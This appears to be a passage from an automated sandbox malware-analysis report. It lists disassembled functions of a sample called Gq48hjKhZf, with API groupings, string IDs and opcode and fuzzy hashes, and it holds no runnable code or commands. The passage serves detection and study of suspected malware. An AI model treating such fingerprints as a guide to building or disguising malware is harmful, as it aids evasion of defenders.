                                      • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
                                      Function 0000000140016FB4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                      • String ID:
                                      • API String ID: 298514914-0
                                      • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                      • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
                                      • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                      • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740
                                      Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: _wcsdupfreewcsncpy$Value
                                      • String ID:
                                      • API String ID: 1554701960-0
                                      • Opcode ID: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
                                      • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
                                      • Opcode Fuzzy Hash: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
                                      • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                      Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$ClassDestroyEnableProcUnregister
                                      • String ID:
                                      • API String ID: 1570244450-0
                                      • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                      • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
                                      • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                      • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
                                      Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                      • String ID:
                                      • API String ID: 3383493704-0
                                      • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                      • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                      • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                      • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                      Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProcSleep
                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                      • API String ID: 938261879-1339284965
                                      • Opcode ID: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
                                      • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
                                      • Opcode Fuzzy Hash: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
                                      • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
                                      Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                      • String ID:
                                      • API String ID: 2527101397-0
                                      • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                      • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                      • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                      • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                      Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocValue$Heap
                                      • String ID:
                                      • API String ID: 2472784365-0
                                      • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                      • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                      • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                      • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                      Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 458812214-0
                                      • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                      • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
                                      • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                      • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300
                                      Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                      • String ID:
                                      • API String ID: 3171405041-0
                                      • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                      • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                      • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                      • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                      Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                      • String ID:
                                      • API String ID: 2544007295-0
                                      • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                      • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                      • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                      • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                      Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memset$memmove
                                      • String ID:
                                      • API String ID: 3527438329-0
                                      • Opcode ID: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
                                      • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
                                      • Opcode Fuzzy Hash: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
                                      • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
                                      Function 0000000140013227 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 273COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $header crc mismatch
                                      • API String ID: 0-4092041874
                                      • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                      • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
                                      • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                      • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
                                      Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heapwcsncpy$AllocFree
                                      • String ID:
                                      • API String ID: 1479455602-0
                                      • Opcode ID: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
                                      • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
                                      • Opcode Fuzzy Hash: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
                                      • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
                                      Function 0000000140013801 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID: $ $invalid stored block lengths
                                      • API String ID: 2162964266-1718185709
                                      • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                      • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
                                      • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                      • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
                                      Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookup$UnwindVirtual
                                      • String ID:
                                      • API String ID: 3286588846-0
                                      • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                      • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                      • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                      • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                      Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CharLower
                                      • String ID:
                                      • API String ID: 1615517891-0
                                      • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                      • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                      • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                      • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                      Function 00000001400174E0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                      • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
                                      • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                      • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
                                      Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                                      • String ID:
                                      • API String ID: 4012708801-0
                                      • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                      • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                      • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                      • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                      Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                      • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                      • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                      • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                      Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeapmemsetwcscpywcslen
                                      • String ID:
                                      • API String ID: 1807340688-0
                                      • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                      • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
                                      • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                      • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
                                      Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
